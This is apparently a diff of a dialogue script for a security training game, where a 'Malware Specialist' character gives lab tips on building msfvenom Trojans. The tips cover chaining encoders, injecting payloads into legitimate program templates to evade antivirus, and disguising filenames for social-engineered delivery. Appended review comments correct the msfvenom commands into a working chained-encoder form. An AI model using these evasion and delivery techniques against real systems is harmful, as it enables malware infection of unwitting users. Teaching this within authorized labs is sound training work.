menu] -> malware_hub -// =========================================== -// CHALLENGE TIPS -// =========================================== - -=== challenge_tips === -Malware Specialist: Practical tips for lab challenges: - -Malware Specialist: **Creating effective Trojans:** -- Start simple 
(windows/adduser or windows/exec) -- Test unencoded version first to ensure payload works -- Then add encoding, check if detection increases -- Finally try template injection for best evasion - -Malware Specialist: **Evasion tips:** -- Experiment with different encoders and iteration counts -- Shikata_ga_nai is popular but widely signatured - try others -- Chain multiple encoders for better results -- Use legitimate programs as templates (notepad, calc, small utilities) -- Test against ClamAV before trying against victim -- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) - -Malware Specialist: **Delivery tips:** -- Make filename convincing (game.exe, important_document.exe, update.exe) -- Social engineering matters - victim needs reason to run it -- In real scenarios: icons, file properties, code signing all add legitimacy -- For lab: simple web delivery works fine - -Malware Specialist: **Verification:** -- Windows: `net user` shows created accounts -- Check Admin group: `net localgroup administrators` -- If payload fails, check syntax and password complexity requirements -- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) - -Malware Specialist: **Troubleshooting:** -- Payload doesn't work? Test simpler version without encoding -- Still detected by AV? Try different template or more encoding iterations -- Apache won't start? `sudo service apache2 status` for error info -- Can't download from Kali? Check IP address (`ip a`) and firewall rules - -{instructor_rapport >= 50: - Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. -} - -+ [Back to main menu] - -> malware_hub - -// =========================================== -// READY FOR PRACTICE -// =========================================== - -=== ready_for_practice === -Malware Specialist: Good. You've covered the core concepts. - -Malware Specialist: Lab objectives: -1. 
Create basic Trojan using msfvenom -2. Test against anti-malware (ClamAV) -3. Use encoding to evade detection -4. Inject payload into legitimate program template -5. Deliver via web server to Windows victim -6. Verify successful exploitation - -{ethical_awareness >= 10: - Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. -} - -Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. - -Malware Specialist: But also by criminals. The difference is authorization and intent. - -Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. - -Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. - -Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. - -#exit_conversation -> END
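Review bot: in the encoding/template hunk (the `encoding_evasion` and `template_injection` knots), the two piped commands `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` and `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` will not work if a player copies them: the first stage has to emit raw shellcode with `-f raw`, and the second stage cannot infer architecture or platform from stdin, so it needs `-a x86 --platform windows` (msfvenom reads the custom payload from stdin when `-p` is omitted or given as `-p -`). Suggest rewriting them with the real payload names used elsewhere in the knot, e.g. `msfvenom -p windows/adduser USER=test PASS=pass123 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe > multi_encoded.exe`; the same broken form recurs in the `Combined:` line of `commands_reference` in the last hunk.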
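Review bot: in the `rat_intro` hunk, `~ haxolottle_rapport += 5` sits at the top of the knot while all three informational choices divert back with `-> rat_intro`, so a player who reads every option is credited 20 rapport from this knot instead of 5 (the `template_injection` knot in the earlier hunk has the same pattern with `+= 10`). The rename from `instructor_rapport` preserves the bug rather than fixing it. Suggest guarding the entry increment with ink's visit count, `{ rat_intro == 1:` / `    ~ haxolottle_rapport += 5` / `}`, or moving the increment into the hub choice that first leads here.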
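Review bot: the last hunk deletes the `challenge_tips` and `ready_for_practice` knots, and with them the `#exit_conversation` / `-> END` exit, but the diff shows no matching removal of the hub choices that divert to them; any remaining `-> challenge_tips` or `-> ready_for_practice` will fail to compile, so please confirm the hub was updated (in a part of the file not shown) and that the story still has an `-> END` path. Also, the removed troubleshooting text stated that `windows/adduser` passwords must contain uppercase, lowercase and digits (e.g. `SecurePass123`), yet the surviving `commands_reference` examples use `PASS=pass` and `PASS=pass123`, which that same text said would fail; suggest changing them to `PASS=SecurePass123` and carrying `net localgroup administrators` into **Windows victim verification** so the practical hints are not lost with the deleted knot.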